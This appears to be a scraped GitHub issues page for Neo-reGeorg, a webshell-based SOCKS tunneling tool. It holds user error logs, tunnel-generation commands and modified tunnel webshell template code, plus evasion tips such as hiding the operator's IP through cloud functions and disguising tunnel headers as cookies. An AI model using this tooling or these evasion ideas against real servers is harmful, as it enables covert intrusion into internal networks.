l-codes / neo-regeorg Goto Github PK
View Code? Open in Web Editor NEWNeo-reGeorg is a project that seeks to aggressively refactor reGeorg
License: GNU General Public License v3.0
Neo-reGeorg is a project that seeks to aggressively refactor reGeorg
License: GNU General Public License v3.0
云函数的出口IP会一直变化,如果能在云函数上运行reGeorg,意味着可以完美隐藏自己IP。
具体原理可参考:白嫖CDN,打造封不尽IP的代理池
其中一个实现:https://github.com/Sakurasan/scf-proxy
但scf-proxy仅支持http协议,如果是reGeorg,还可以支持任意tcp协议
PHP版本5.3.8;浏览器可以正常访问,
curl http://114.114.114.114/watermark/201808/tunnel.php
返回
本机执行命令后显示连接正常,设置好proxifier后尝试连接114.114.114.114对应的192.168.8.51就报错
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting socks server [127.0.0.1:8888], tunnel at [http://114.114.114.114/watermark/201808/tunnel.php]
+------------------------------------------------------------------------+
[�[1m�[1;33mCRITICAL�[0m�[0m] Bad KEY or non-neoreg server
[�[1m�[1;31mERROR�[0m �[0m] [RUN] [192.168.8.55:81] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python3.7.7\lib\threading.py", line 926, in _bootstrap_inner
self.run()
File "D:\Neo-reGeorg\neoreg.py", line 415, in run
if self.handleSocks(self.pSocket):
File "D:\Neo-reGeorg\neoreg.py", line 261, in handleSocks
return self.parseSocks5(sock)
File "D:\Neo-reGeorg\neoreg.py", line 225, in parseSocks5
raise RemoteConnectionFailed("[%s:%d] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [192.168.8.55:81] Remote failed
不知是不是使用方法不对还是什么问题?确定连接key没有错,请指教。
python neoreg.py generate -k password -f 404.html --httpcode 404
[ Github ] https://github.com/L-codes/neoreg
+------------------------------------------------------------------------+
Log Level set to [INFO]
Starting socks server [127.0.0.1:1080]
Tunnel at:
http://192.168.122.1:8080/tunnel.jsp
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
Traceback (most recent call last):
File "neoreg.py", line 673, in
askGeorg(conn, urls, redirect_urls)
File "neoreg.py", line 461, in askGeorg
log.error('Expect Response: ' + BASICCHECKSTRING[0:100])
TypeError: can only concatenate str (not "bytes") to str
404.html content:
page is not found!
当网站不支持gzip压缩时 ,会报错Georg is not ready, please check URL.
需要改conn.headers['Accept-Encoding'] = '' 可正常连接
看了一下源码,其实一些关键head头还是比较明显的
httpx 支持http2,
pip3 install httpx
pip3 install 'httpx[http2]'
requests.Session() 替换成 httpx.Client(http2=True)
使用http2的多路复用减少握手.
How to use the parameter -r ? Support Exchange aspx?
Example:
Load balancing
Server 1 is 19.16.1.120 with neo-regeorg test.aspx, intranet ip is 172.10.10.120
Server 2 is 19.16.1.121 without new-regeorg, intranet ip is 172.10.10.121
pthon3 neoreg.py -u https://19.16.1.120/test.aspx -k passssss-r https://172.10.10.120/test.aspx
If it accessed 19.16.1.121, got 404:
[INFO] Checking if Georg is ready
[WARNING] Using redirection will affect performance when the response code >= 400
[WARNING] Expect Response: b''
[WARNING] Real Response: b'\r\n\r\n \r\n <title>The resource cannot be found.</title>\r\n <'
[ERROR] Georg is not ready, please check URL and KEY. rep: [404] Not Found
[ERROR] You can set the --skip
parameter to ignore errors
If it accessed 19.16.1.120, got 200, but Response is null:
[INFO] Checking if Georg is ready
[WARNING] Expect Response: b''
[WARNING ] Real Response: b''
[ERROR] Georg is not ready, please check URL and KEY. rep: [200] OK
[ERROR] You can set the --skip
parameter to ignore errors
But if I do not use -r, and if it accessed 19.16.1.120, everything is right.
作者出个gui版本呀,输入url和密码就能启动
<html><p>原始base64数据Hr862cRcRES_9AFMojsEHA</p></html>
我阅读了
neoreg.py
源代码和对应的webshell源代码,尝试修改,通过在返回数据中加入标识,再使用正则匹配来解决这个问题。
neoreg.py
# 在session类的reader函数中,加入数据处理函数
def mapping_body(self, data):
re_pattern = self.session_mark() + r'(.*?)' + self.session_mark() # 使用内置的mark关键值对响应数据进行处理
re_metch_result = re.search(re_pattern, data)
if re_metch_result:
return re_metch_result.group(1)
else:
return ''
# 使用新加函数对requests返回数据的处理
if status == V["OK"]:
data = self.mapping_body(response.content) # 添加mapping_body函数,正则处理返回数据
if len(data) == 0:
sleep(READINTERVAL)
continue
else:
data = self.decode_body(data)
templates/tunnel.php
// 直接修改echo
if ($running) {
header('X-STATUS: OK');
header("Connection: Keep-Alive");
echo $mark . strtr(base64_encode($readBuffer), $en, $de) . $mark; // 直接拼接mark
} else {
header('X-STATUS: FAIL');
}
templates/tunnel.aspx
while (c > 0) {
byte[] newBuff = new byte[c];
System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
string b64 = Convert.ToBase64String(newBuff);
Response.BinaryWrite(mark + Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark); // 输出时拼接mark关键字
readLen += c;
if (c < READBUF || readLen >= maxRead)
break;
c = s.Receive(readBuff);
}
templates/tunnel.ashx
while (c > 0) {
byte[] newBuff = new byte[c];
System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
string b64 = Convert.ToBase64String(newBuff);
context.Response.BinaryWrite(mark + System.Text.Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark ); // 输出时拼接mark关键字
readLen += c;
if (c < READBUF || readLen >= maxRead)
break;
c = s.Receive(readBuff);
}
templates/tunnel.jsp
无
templates/tunnel.jspx
无
Log Level set to [ERROR]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
http://120.202.xxx.xxx:8080/admin/css/index1.jsp
+------------------------------------------------------------------------+
[ERROR ] Georg is not ready, please check URL.
现在的包是这样的
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej;
请求头里这两项看起来就比较奇怪,移到Cookie里看上去要正常些
Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=
变成
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Ghqgvikywyowmvo=UiTmMveJTNWkkm8wRUn4VwHBfkng; Yuwjttakkvh= wmwm501dsNWz50F/Q9icFyI=
或者更进一步对这两行编码下,在Cookie里变成下面这样,Auth从一堆类似词里随机选取
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Auth=xxxxx
This improved version looks sick, can you just translate the README in english please? Or move the actual readme to README.XX.md where XX is the country code of the language it is written and make a README.md or README.en.md in english.
OS 名称: Microsoft Windows Server 2012 R2 Datacenter
OS 版本: 6.3.9600 暂缺 Build 9600
java.runtime.version = 1.6.0_14-b08
jboss
使用冰蝎可以进行正向代理,neo会报错500
pytohn 把python写错了
类似冰蝎、哥斯拉,输入url、密码、监听端口,方便批量管理和重复利用
+------------------------------------------------------------------------+
Log Level set to [WARNING]
Starting socks server [127.0.0.1:1080]
Tunnel at:
https://www.example.de/files/iamges/tunnel.ashx
+------------------------------------------------------------------------+
[ERROR ] [FORWARD] [216.58.215.238:80] HTTP [403]: Shutting down
[ERROR ] [FORWARD] [52.143.255.96:80] HTTP [403]: Shutting down
jsp(x) certificate verification problem:
Error 500 Internal Server Error.
When chek it with curl: , no errors.
How fix it?
win10 ,python3.7环境
[�[1m�[1;31mERROR�[0m �[0m] Georg is not ready, please check url. rep: [404] Not Found
t3.jsp:27:190: The attribute "trimDirectiveWhitespaces" is supported by JSP 2.1 or higher version.
有些iis只支持asp,没配置.net
在docker wordpress容器下不成功,,
我用的 wordpress 镜像是 wordpress:php7.2-apache
举例:我通过代理 putty 去连 192.168.1.4 : 22
在 192.168.1.4 机器上能看 到 22已经 建立连接,但是没有数据包返回,一直卡在那,
该怎么破!!
生成的php马好像只能使用在apache服务器的环境下。
+------------------------------------------------------------------------+
[ERROR ] Expect Response:
[ERROR ] Real Response:
[ERROR ] Georg is not ready, please check URL and KEY. rep: [200] OK
命令如下:
python neoreg.py -u http://1.1.1.1/neo.php -k 123456 -H "Authorization: Basic YWRtaW46cXdlcnR 5"
如题
--local-dns Local read buffer, max data to be sent per
POST.(default: 2048 max: 2600)
--read-buff Bytes Local read buffer, max data to be sent per
POST.(default: 2048 max: 2600)
这里面的--local-dns
描述写错了
是否解决旧版本的reGeorg JSP脚本不支持weblogic中间件问题?
系统:Windows10
环境:phpstudy_pro 8.1.0.6
php版本:php5.6.9和php7.3.4
[CRITICAL] Bad KEY or non-neoreg server
[ERROR ] [RUN] [127.0.0.1:3389] [NOT Cookie Response] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "neoreg.py", line 415, in run
if self.handleSocks(self.pSocket):
File "neoreg.py", line 261, in handleSocks
return self.parseSocks5(sock)
File "neoreg.py", line 225, in parseSocks5
raise RemoteConnectionFailed("[%s:%d] [NOT Cookie Response] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [127.0.0.1:3389] [NOT Cookie Response] Remote failed
tunnel.php和tunnel.nosocket.php都是一样的错误,用kali的LAMP倒是没问题。
希望兼容原版reGeorg连接,遇到了一个工具注入的原版regeorg内存马,给作者提lssues改成Neo-reGeorg无果。
“由于数据加密错误,这个会话将结束。请重新连接到远程计算机。”
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
Linux下clone
生成的php脚本最后会有一行空行
导致没有数据时总是返回 '\n'
去掉最后的空行或者让脚本不闭合就可以了
我可以把Neo-reGeorg项目加到哥斯拉吗?
不知道对连接有影响吗?
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:794: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
InsecureRequestWarning)
宝塔 php8.0 环境 套的CF. 不知道为什么。不套CF也一样的结果。
Log Level set to [INFO]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
https://www.xxxx.com/nat.php
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
[WARNING ] Server Session expired
[WARNING ] Automatically append Cookies: __cfduid=dcafee59db222c06c30d13673c175910f1613723661;PHPSESSID=1rp16km3ko7aagtn3ib62mnv9g;
[INFO ] Georg says, 'All seems fine'
[CRITICAL ] [Errno 10013]
The name 'HTTPCODE' does not exist in the current context
Can not connect to the server
报错如下:
HTTP Status 500 -
type Exception report
message
description The server encountered an internal error () that prevented it from fulfilling this request.
exception
org.apache.jasper.JasperException: Unable to compile class for JSP
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:512)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:377)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause
org.apache.jasper.JasperException: Unable to compile class for JSP
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable
org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:414)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:305)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
note The full stack trace of the root cause is available in the Apache Tomcat/5.5.20 logs.
Apache Tomcat/5.5.20
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.